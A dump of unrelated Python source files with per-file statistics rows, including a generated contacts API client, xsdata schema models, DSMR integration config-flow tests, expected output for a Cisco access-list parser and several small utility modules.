_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_contacts(self, **kwargs): # noqa: E501
"""Get all contacts # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_contacts(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: list[ContactProjection]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_contacts_with_http_info(**kwargs) # noqa: E501
def get_contacts_with_http_info(self, **kwargs): # noqa: E501
"""Get all contacts # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_contacts_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(list[ContactProjection], status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_contacts" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['API_KEY'] # noqa: E501
return self.api_client.call_api(
'/contacts', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[ContactProjection]', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
| 43.351464 | 487 | 0.590065 | 3,413 | 31,083 | 5.118371 | 0.069733 | 0.041674 | 0.063312 | 0.030912 | 0.913218 | 0.909726 | 0.9032 | 0.901311 | 0.878871 | 0.874005 | 0 | 0.012964 | 0.337419 | 31,083 | 716 | 488 | 43.412011 | 0.835251 | 0.458868 | 0 | 0.697059 | 0 | 0 | 0.164253 | 0.045139 | 0 | 0 | 0 | 0 | 0 | 1 | 0.038235 | false | 0 | 0.014706 | 0 | 0.091176 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
b9fb65b57d2f2bc39e6e3a9c6f9fac58f0dea3de | 1,509 | py | Python | output/models/ms_data/particles/particles_z008_xsd/particles_z008.py | tefra/xsdata-w3c-tests | b6b6a4ac4e0ab610e4b50d868510a8b7105b1a5f | [
"MIT"
] | 1 | 2021-08-14T17:59:21.000Z | 2021-08-14T17:59:21.000Z | output/models/ms_data/particles/particles_z008_xsd/particles_z008.py | tefra/xsdata-w3c-tests | b6b6a4ac4e0ab610e4b50d868510a8b7105b1a5f | [
"MIT"
] | 4 | 2020-02-12T21:30:44.000Z | 2020-04-15T20:06:46.000Z | output/models/ms_data/particles/particles_z008_xsd/particles_z008.py | tefra/xsdata-w3c-tests | b6b6a4ac4e0ab610e4b50d868510a8b7105b1a5f | [
"MIT"
] | null | null | null | from dataclasses import dataclass, field
from typing import Optional
__NAMESPACE__ = "urn:my-namespace"
@dataclass
class ContainHead2Type:
member2: Optional[str] = field(
default=None,
metadata={
"name": "Member2",
"type": "Element",
"namespace": "urn:my-namespace",
}
)
head2: Optional[str] = field(
default=None,
metadata={
"name": "Head2",
"type": "Element",
"namespace": "urn:my-namespace",
}
)
@dataclass
class ContainMember2Type:
member2: Optional[str] = field(
default=None,
metadata={
"name": "Member2",
"type": "Element",
"namespace": "urn:my-namespace",
"required": True,
}
)
head2: Optional[str] = field(
default=None,
metadata={
"name": "Head2",
"type": "Element",
"namespace": "urn:my-namespace",
}
)
@dataclass
class Head2:
class Meta:
namespace = "urn:my-namespace"
value: str = field(
default="",
metadata={
"required": True,
}
)
@dataclass
class Member2:
class Meta:
namespace = "urn:my-namespace"
value: str = field(
default="",
metadata={
"required": True,
}
)
@dataclass
class Root(ContainMember2Type):
class Meta:
name = "root"
namespace = "urn:my-namespace"
| 19.101266 | 44 | 0.503645 | 125 | 1,509 | 6.048 | 0.216 | 0.126984 | 0.148148 | 0.243386 | 0.763228 | 0.763228 | 0.714286 | 0.714286 | 0.714286 | 0.714286 | 0 | 0.013584 | 0.365805 | 1,509 | 78 | 45 | 19.346154 | 0.776385 | 0 | 0 | 0.676923 | 0 | 0 | 0.182903 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.030769 | 0 | 0.246154 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
e02d9a747a62e7e25852ddfea65d2e77ec57e0d4 | 69 | py | Python | fds/datax/_get_data/__init__.py | factset/fds-datax | 4796d65b3ad25b4295999f59d3244db1b8eace6f | [
"Apache-2.0"
] | 1 | 2022-02-01T19:12:23.000Z | 2022-02-01T19:12:23.000Z | fds/datax/_get_data/__init__.py | factset/fds-datax | 4796d65b3ad25b4295999f59d3244db1b8eace6f | [
"Apache-2.0"
] | null | null | null | fds/datax/_get_data/__init__.py | factset/fds-datax | 4796d65b3ad25b4295999f59d3244db1b8eace6f | [
"Apache-2.0"
] | null | null | null | from fds.datax._get_data._get_data import (GetSDFData as getsdfdata)
| 34.5 | 68 | 0.84058 | 11 | 69 | 4.909091 | 0.727273 | 0.259259 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.086957 | 69 | 1 | 69 | 69 | 0.857143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
0edaa345d001facc259399202f5810f0bf4901fe | 8,205 | py | Python | tests/components/dsmr/test_config_flow.py | pcaston/core | e74d946cef7a9d4e232ae9e0ba150d18018cfe33 | [
"Apache-2.0"
] | 1 | 2021-07-08T20:09:55.000Z | 2021-07-08T20:09:55.000Z | tests/components/dsmr/test_config_flow.py | pcaston/core | e74d946cef7a9d4e232ae9e0ba150d18018cfe33 | [
"Apache-2.0"
] | 47 | 2021-02-21T23:43:07.000Z | 2022-03-31T06:07:10.000Z | tests/components/dsmr/test_config_flow.py | OpenPeerPower/core | f673dfac9f2d0c48fa30af37b0a99df9dd6640ee | [
"Apache-2.0"
] | null | null | null | """Test the DSMR config flow."""
import asyncio
from itertools import chain, repeat
from unittest.mock import DEFAULT, AsyncMock, patch
import serial
from openpeerpower import config_entries, data_entry_flow, setup
from openpeerpower.components.dsmr import DOMAIN
from tests.common import MockConfigEntry
SERIAL_DATA = {"serial_id": "12345678", "serial_id_gas": "123456789"}
async def test_import_usb(opp, dsmr_connection_send_validate_fixture):
"""Test we can import."""
await setup.async_setup_component(opp, "persistent_notification", {})
entry_data = {
"port": "/dev/ttyUSB0",
"dsmr_version": "2.2",
"precision": 4,
"reconnect_interval": 30,
}
with patch("openpeerpower.components.dsmr.async_setup_entry", return_value=True):
result = await opp.config_entries.flow.async_init(
DOMAIN,
context={"source": config_entries.SOURCE_IMPORT},
data=entry_data,
)
assert result["type"] == "create_entry"
assert result["title"] == "/dev/ttyUSB0"
assert result["data"] == {**entry_data, **SERIAL_DATA}
async def test_import_usb_failed_connection(opp, dsmr_connection_send_validate_fixture):
"""Test we can import."""
(connection_factory, transport, protocol) = dsmr_connection_send_validate_fixture
await setup.async_setup_component(opp, "persistent_notification", {})
entry_data = {
"port": "/dev/ttyUSB0",
"dsmr_version": "2.2",
"precision": 4,
"reconnect_interval": 30,
}
# override the mock to have it fail the first time and succeed after
first_fail_connection_factory = AsyncMock(
return_value=(transport, protocol),
side_effect=chain([serial.serialutil.SerialException], repeat(DEFAULT)),
)
with patch(
"openpeerpower.components.dsmr.async_setup_entry", return_value=True
), patch(
"openpeerpower.components.dsmr.config_flow.create_dsmr_reader",
first_fail_connection_factory,
):
result = await opp.config_entries.flow.async_init(
DOMAIN,
context={"source": config_entries.SOURCE_IMPORT},
data=entry_data,
)
assert result["type"] == "abort"
assert result["reason"] == "cannot_connect"
async def test_import_usb_no_data(opp, dsmr_connection_send_validate_fixture):
"""Test we can import."""
(connection_factory, transport, protocol) = dsmr_connection_send_validate_fixture
await setup.async_setup_component(opp, "persistent_notification", {})
entry_data = {
"port": "/dev/ttyUSB0",
"dsmr_version": "2.2",
"precision": 4,
"reconnect_interval": 30,
}
# override the mock to have it fail the first time and succeed after
wait_closed = AsyncMock(
return_value=(transport, protocol),
side_effect=chain([asyncio.TimeoutError], repeat(DEFAULT)),
)
protocol.wait_closed = wait_closed
with patch("openpeerpower.components.dsmr.async_setup_entry", return_value=True):
result = await opp.config_entries.flow.async_init(
DOMAIN,
context={"source": config_entries.SOURCE_IMPORT},
data=entry_data,
)
assert result["type"] == "abort"
assert result["reason"] == "cannot_communicate"
async def test_import_usb_wrong_telegram(opp, dsmr_connection_send_validate_fixture):
"""Test we can import."""
(connection_factory, transport, protocol) = dsmr_connection_send_validate_fixture
await setup.async_setup_component(opp, "persistent_notification", {})
entry_data = {
"port": "/dev/ttyUSB0",
"dsmr_version": "2.2",
"precision": 4,
"reconnect_interval": 30,
}
protocol.telegram = {}
with patch("openpeerpower.components.dsmr.async_setup_entry", return_value=True):
result = await opp.config_entries.flow.async_init(
DOMAIN,
context={"source": config_entries.SOURCE_IMPORT},
data=entry_data,
)
assert result["type"] == "abort"
assert result["reason"] == "cannot_communicate"
async def test_import_network(opp, dsmr_connection_send_validate_fixture):
"""Test we can import from network."""
await setup.async_setup_component(opp, "persistent_notification", {})
entry_data = {
"host": "localhost",
"port": "1234",
"dsmr_version": "2.2",
"precision": 4,
"reconnect_interval": 30,
}
with patch("openpeerpower.components.dsmr.async_setup_entry", return_value=True):
result = await opp.config_entries.flow.async_init(
DOMAIN,
context={"source": config_entries.SOURCE_IMPORT},
data=entry_data,
)
assert result["type"] == "create_entry"
assert result["title"] == "localhost:1234"
assert result["data"] == {**entry_data, **SERIAL_DATA}
async def test_import_update(opp, dsmr_connection_send_validate_fixture):
"""Test we can import."""
await setup.async_setup_component(opp, "persistent_notification", {})
entry_data = {
"port": "/dev/ttyUSB0",
"dsmr_version": "2.2",
"precision": 4,
"reconnect_interval": 30,
}
entry = MockConfigEntry(
domain=DOMAIN,
data=entry_data,
unique_id="/dev/ttyUSB0",
)
entry.add_to_opp(opp)
with patch(
"openpeerpower.components.dsmr.async_setup_entry", return_value=True
), patch("openpeerpower.components.dsmr.async_unload_entry", return_value=True):
await opp.config_entries.async_setup(entry.entry_id)
await opp.async_block_till_done()
new_entry_data = {
"port": "/dev/ttyUSB0",
"dsmr_version": "2.2",
"precision": 3,
"reconnect_interval": 30,
}
with patch(
"openpeerpower.components.dsmr.async_setup_entry", return_value=True
), patch("openpeerpower.components.dsmr.async_unload_entry", return_value=True):
result = await opp.config_entries.flow.async_init(
DOMAIN,
context={"source": config_entries.SOURCE_IMPORT},
data=new_entry_data,
)
await opp.async_block_till_done()
assert result["type"] == "abort"
assert result["reason"] == "already_configured"
assert entry.data["precision"] == 3
async def test_options_flow(opp):
"""Test options flow."""
await setup.async_setup_component(opp, "persistent_notification", {})
entry_data = {
"port": "/dev/ttyUSB0",
"dsmr_version": "2.2",
"precision": 4,
"reconnect_interval": 30,
}
entry = MockConfigEntry(
domain=DOMAIN,
data=entry_data,
unique_id="/dev/ttyUSB0",
)
entry.add_to_opp(opp)
result = await opp.config_entries.options.async_init(entry.entry_id)
assert result["type"] == "form"
assert result["step_id"] == "init"
result = await opp.config_entries.options.async_configure(
result["flow_id"],
user_input={
"time_between_update": 15,
},
)
with patch(
"openpeerpower.components.dsmr.async_setup_entry", return_value=True
), patch("openpeerpower.components.dsmr.async_unload_entry", return_value=True):
assert result["type"] == data_entry_flow.RESULT_TYPE_CREATE_ENTRY
await opp.async_block_till_done()
assert entry.options == {"time_between_update": 15}
async def test_import_luxembourg(opp, dsmr_connection_send_validate_fixture):
"""Test we can import."""
await setup.async_setup_component(opp, "persistent_notification", {})
entry_data = {
"port": "/dev/ttyUSB0",
"dsmr_version": "5L",
"precision": 4,
"reconnect_interval": 30,
}
with patch("openpeerpower.components.dsmr.async_setup_entry", return_value=True):
result = await opp.config_entries.flow.async_init(
DOMAIN,
context={"source": config_entries.SOURCE_IMPORT},
data=entry_data,
)
assert result["type"] == "create_entry"
assert result["title"] == "/dev/ttyUSB0"
assert result["data"] == {**entry_data, **SERIAL_DATA}
| 30.845865 | 88 | 0.65521 | 928 | 8,205 | 5.510776 | 0.131466 | 0.038717 | 0.073915 | 0.081345 | 0.811107 | 0.801721 | 0.796637 | 0.762417 | 0.742081 | 0.742081 | 0 | 0.013484 | 0.222669 | 8,205 | 265 | 89 | 30.962264 | 0.788335 | 0.019622 | 0 | 0.645833 | 0 | 0 | 0.22492 | 0.103642 | 0 | 0 | 0 | 0 | 0.114583 | 1 | 0 | false | 0 | 0.109375 | 0 | 0.109375 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
0efbcbcedd750b6cc8e00716e55da8079daef7c4 | 48 | py | Python | app/Camera/__init__.py | gizmo-cda/g2x | 841364b8ef4ef4197bbb3682f33ff4ddd539619f | [
"MIT"
] | null | null | null | app/Camera/__init__.py | gizmo-cda/g2x | 841364b8ef4ef4197bbb3682f33ff4ddd539619f | [
"MIT"
] | null | null | null | app/Camera/__init__.py | gizmo-cda/g2x | 841364b8ef4ef4197bbb3682f33ff4ddd539619f | [
"MIT"
] | null | null | null | from .camera_controller import CameraController
| 24 | 47 | 0.895833 | 5 | 48 | 8.4 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.083333 | 48 | 1 | 48 | 48 | 0.954545 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
160052f0e99ceed94956511a2be3a21c5039bdea | 4,109 | py | Python | src/genie/libs/parser/ios/tests/ShowAccessLists/cli/equal/golden_output_standard_expected.py | balmasea/genieparser | d1e71a96dfb081e0a8591707b9d4872decd5d9d3 | [
"Apache-2.0"
] | 204 | 2018-06-27T00:55:27.000Z | 2022-03-06T21:12:18.000Z | src/genie/libs/parser/ios/tests/ShowAccessLists/cli/equal/golden_output_standard_expected.py | balmasea/genieparser | d1e71a96dfb081e0a8591707b9d4872decd5d9d3 | [
"Apache-2.0"
] | 468 | 2018-06-19T00:33:18.000Z | 2022-03-31T23:23:35.000Z | src/genie/libs/parser/ios/tests/ShowAccessLists/cli/equal/golden_output_standard_expected.py | balmasea/genieparser | d1e71a96dfb081e0a8591707b9d4872decd5d9d3 | [
"Apache-2.0"
] | 309 | 2019-01-16T20:21:07.000Z | 2022-03-30T12:56:41.000Z | expected_output = {
"1": {
"aces": {
"10": {
"actions": {"forwarding": "permit"},
"matches": {
"l3": {
"ipv4": {
"protocol": "ipv4",
"source_network": {
"172.20.10.10 0.0.0.0": {
"source_network": "172.20.10.10 0.0.0.0"
}
},
}
}
},
"name": "10",
}
},
"name": "1",
"type": "ipv4-acl-type",
"acl_type": "standard",
},
"10": {
"aces": {
"10": {
"actions": {"forwarding": "permit"},
"matches": {
"l3": {
"ipv4": {
"protocol": "ipv4",
"source_network": {
"10.66.12.12 0.0.0.0": {
"source_network": "10.66.12.12 0.0.0.0"
}
},
}
}
},
"name": "10",
}
},
"name": "10",
"type": "ipv4-acl-type",
"acl_type": "standard",
},
"12": {
"aces": {
"10": {
"actions": {"forwarding": "deny"},
"matches": {
"l3": {
"ipv4": {
"protocol": "ipv4",
"source_network": {
"10.16.3.2 0.0.0.0": {
"source_network": "10.16.3.2 0.0.0.0"
}
},
}
}
},
"name": "10",
}
},
"name": "12",
"type": "ipv4-acl-type",
"acl_type": "standard",
},
"32": {
"aces": {
"10": {
"actions": {"forwarding": "permit"},
"matches": {
"l3": {
"ipv4": {
"protocol": "ipv4",
"source_network": {
"172.20.20.20 0.0.0.0": {
"source_network": "172.20.20.20 0.0.0.0"
}
},
}
}
},
"name": "10",
}
},
"name": "32",
"type": "ipv4-acl-type",
"acl_type": "standard",
},
"34": {
"aces": {
"10": {
"actions": {"forwarding": "permit"},
"matches": {
"l3": {
"ipv4": {
"protocol": "ipv4",
"source_network": {
"10.24.35.56 0.0.0.0": {
"source_network": "10.24.35.56 0.0.0.0"
}
},
}
}
},
"name": "10",
},
"20": {
"actions": {"forwarding": "permit"},
"matches": {
"l3": {
"ipv4": {
"protocol": "ipv4",
"source_network": {
"10.34.56.34 0.0.0.0": {
"source_network": "10.34.56.34 0.0.0.0"
}
},
}
}
},
"name": "20",
},
},
"name": "34",
"type": "ipv4-acl-type",
"acl_type": "standard",
},
}
| 30.664179 | 76 | 0.212704 | 243 | 4,109 | 3.522634 | 0.131687 | 0.084112 | 0.084112 | 0.056075 | 0.921729 | 0.917056 | 0.910047 | 0.688084 | 0.658879 | 0.658879 | 0 | 0.14208 | 0.642005 | 4,109 | 133 | 77 | 30.894737 | 0.439837 | 0 | 0 | 0.466165 | 0 | 0 | 0.23193 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
160a304ecffe78028044638bda82a29216821949 | 109 | py | Python | bank_import/admin.py | oronibrian/Tenant | 42662797db54f8f169a570c920795c487ce3896a | [
"MIT"
] | 24 | 2015-01-28T20:02:27.000Z | 2021-10-03T15:29:44.000Z | bank_import/admin.py | oronibrian/Tenant | 42662797db54f8f169a570c920795c487ce3896a | [
"MIT"
] | 31 | 2015-01-19T20:51:40.000Z | 2018-12-13T14:54:01.000Z | bank_import/admin.py | oronibrian/Tenant | 42662797db54f8f169a570c920795c487ce3896a | [
"MIT"
] | 20 | 2015-11-15T14:07:20.000Z | 2021-10-03T17:07:42.000Z | from django.contrib import admin
from django.utils.translation import ugettext as _
from main import models
| 21.8 | 50 | 0.834862 | 16 | 109 | 5.625 | 0.6875 | 0.222222 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.137615 | 109 | 4 | 51 | 27.25 | 0.957447 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
161640ce273e36587af221c46e1ffaec6d83e90f | 109 | py | Python | ComRISB/pygtool/init_subval_tsolver.py | comscope/comsuite | d51c43cad0d15dc3b4d1f45e7df777cdddaa9d6c | [
"BSD-3-Clause"
] | 18 | 2019-06-15T18:08:21.000Z | 2022-01-30T05:01:29.000Z | ComRISB/pygtool/init_subval_tsolver.py | comscope/Comsuite | b80ca9f34c519757d337487c489fb655f7598cc2 | [
"BSD-3-Clause"
] | null | null | null | ComRISB/pygtool/init_subval_tsolver.py | comscope/Comsuite | b80ca9f34c519757d337487c489fb655f7598cc2 | [
"BSD-3-Clause"
] | 11 | 2019-06-05T02:57:55.000Z | 2021-12-29T02:54:25.000Z | #!/usr/bin/env python
from pyglib.gutz.init_subval_tsolver import init_subval_tsolver
init_subval_tsolver()
| 21.8 | 63 | 0.844037 | 17 | 109 | 5.058824 | 0.647059 | 0.348837 | 0.593023 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.073395 | 109 | 4 | 64 | 27.25 | 0.851485 | 0.183486 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.5 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
161678b591e93e2670ebc1fa0343af69414e03ac | 457 | py | Python | course-material/platform-services/analysis-service/utils/helpers.py | estensen/spacemaker-docker-kubernetes-course | bc0e03ed11a227b74c0457241fb6c48c8f8ada3c | [
"MIT"
] | null | null | null | course-material/platform-services/analysis-service/utils/helpers.py | estensen/spacemaker-docker-kubernetes-course | bc0e03ed11a227b74c0457241fb6c48c8f8ada3c | [
"MIT"
] | null | null | null | course-material/platform-services/analysis-service/utils/helpers.py | estensen/spacemaker-docker-kubernetes-course | bc0e03ed11a227b74c0457241fb6c48c8f8ada3c | [
"MIT"
] | null | null | null | import numpy as np
def get_polygon_cords(building_data):
return np.array(
[
[building_data["x"], building_data["y"]],
[building_data["x"] + building_data["dx"], building_data["y"]],
[
building_data["x"] + building_data["dx"],
building_data["y"] + building_data["dy"],
],
[building_data["x"], building_data["y"] + building_data["dy"]],
]
)
| 28.5625 | 75 | 0.509847 | 49 | 457 | 4.44898 | 0.326531 | 0.715596 | 0.238532 | 0.385321 | 0.733945 | 0.733945 | 0.715596 | 0.715596 | 0.481651 | 0.481651 | 0 | 0 | 0.321663 | 457 | 15 | 76 | 30.466667 | 0.703226 | 0 | 0 | 0 | 0 | 0 | 0.035011 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.076923 | false | 0 | 0.076923 | 0.076923 | 0.230769 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
1626c2a5eb6b28dabfea5931e5a5c031cf28009d | 38 | py | Python | Bot/1_Find/Logic/_List_Of_Stocks.py | ReedGraff/High-Low | c8ba0339d7818e344cacf9a73a83d24dc539c2ca | [
"MIT"
] | 1 | 2022-01-06T05:50:53.000Z | 2022-01-06T05:50:53.000Z | Bot/1_Find/Logic/_List_Of_Stocks.py | ReedGraff/High-Low | c8ba0339d7818e344cacf9a73a83d24dc539c2ca | [
"MIT"
] | null | null | null | Bot/1_Find/Logic/_List_Of_Stocks.py | ReedGraff/High-Low | c8ba0339d7818e344cacf9a73a83d24dc539c2ca | [
"MIT"
] | null | null | null | def List_Of_Stocks(self):
return 0 | 19 | 25 | 0.736842 | 7 | 38 | 3.714286 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.032258 | 0.184211 | 38 | 2 | 26 | 19 | 0.806452 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | false | 0 | 0 | 0.5 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
16724876d55904e397e0997a494911b83e46b50f | 140 | py | Python | django/core/views.py | shamsow/django-react-homemaker | 8bfc6de6a7bcb838069904af8bf8f2e1f8671297 | [
"MIT",
"Unlicense"
] | null | null | null | django/core/views.py | shamsow/django-react-homemaker | 8bfc6de6a7bcb838069904af8bf8f2e1f8671297 | [
"MIT",
"Unlicense"
] | 14 | 2021-09-07T13:56:02.000Z | 2022-01-19T13:13:54.000Z | django/core/views.py | shamsow/django-react-homemaker | 8bfc6de6a7bcb838069904af8bf8f2e1f8671297 | [
"MIT",
"Unlicense"
] | null | null | null | from django.shortcuts import reverse, HttpResponseRedirect
def default_view(request):
return HttpResponseRedirect(reverse('admin:index'))
| 28 | 58 | 0.835714 | 15 | 140 | 7.733333 | 0.866667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.078571 | 140 | 4 | 59 | 35 | 0.899225 | 0 | 0 | 0 | 0 | 0 | 0.078571 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 6 |
167fa52465666ca636edd2498305844058711ec8 | 112 | py | Python | stachrl/utils/clearscreen.py | christophstach/reinforcement-learning-klutzy-back-phoebe | 7fdf557f51ea29038a193fbfc6b63261e5fe4685 | [
"MIT"
] | null | null | null | stachrl/utils/clearscreen.py | christophstach/reinforcement-learning-klutzy-back-phoebe | 7fdf557f51ea29038a193fbfc6b63261e5fe4685 | [
"MIT"
] | null | null | null | stachrl/utils/clearscreen.py | christophstach/reinforcement-learning-klutzy-back-phoebe | 7fdf557f51ea29038a193fbfc6b63261e5fe4685 | [
"MIT"
] | null | null | null | import os
def clearscreen():
# os.system('cls' if os.name == 'nt' else 'clear')
print('\033[H\033[J')
| 16 | 54 | 0.580357 | 18 | 112 | 3.611111 | 0.833333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.067416 | 0.205357 | 112 | 6 | 55 | 18.666667 | 0.662921 | 0.428571 | 0 | 0 | 0 | 0 | 0.193548 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | true | 0 | 0.333333 | 0 | 0.666667 | 0.333333 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
168632ad4b620ff40d22b804c3f5abc6dc67669a | 41 | py | Python | semantic/semantic/logging/__init__.py | VladimirSiv/semantic-search-system | 96b6581f191aacb1157b1408b2726e317ddc2c49 | [
"MIT"
] | 1 | 2021-07-01T08:53:46.000Z | 2021-07-01T08:53:46.000Z | front/front/logging/__init__.py | VladimirSiv/semantic-search-system | 96b6581f191aacb1157b1408b2726e317ddc2c49 | [
"MIT"
] | null | null | null | front/front/logging/__init__.py | VladimirSiv/semantic-search-system | 96b6581f191aacb1157b1408b2726e317ddc2c49 | [
"MIT"
] | 1 | 2021-12-29T01:18:38.000Z | 2021-12-29T01:18:38.000Z | from .logger import logger, logger_setup
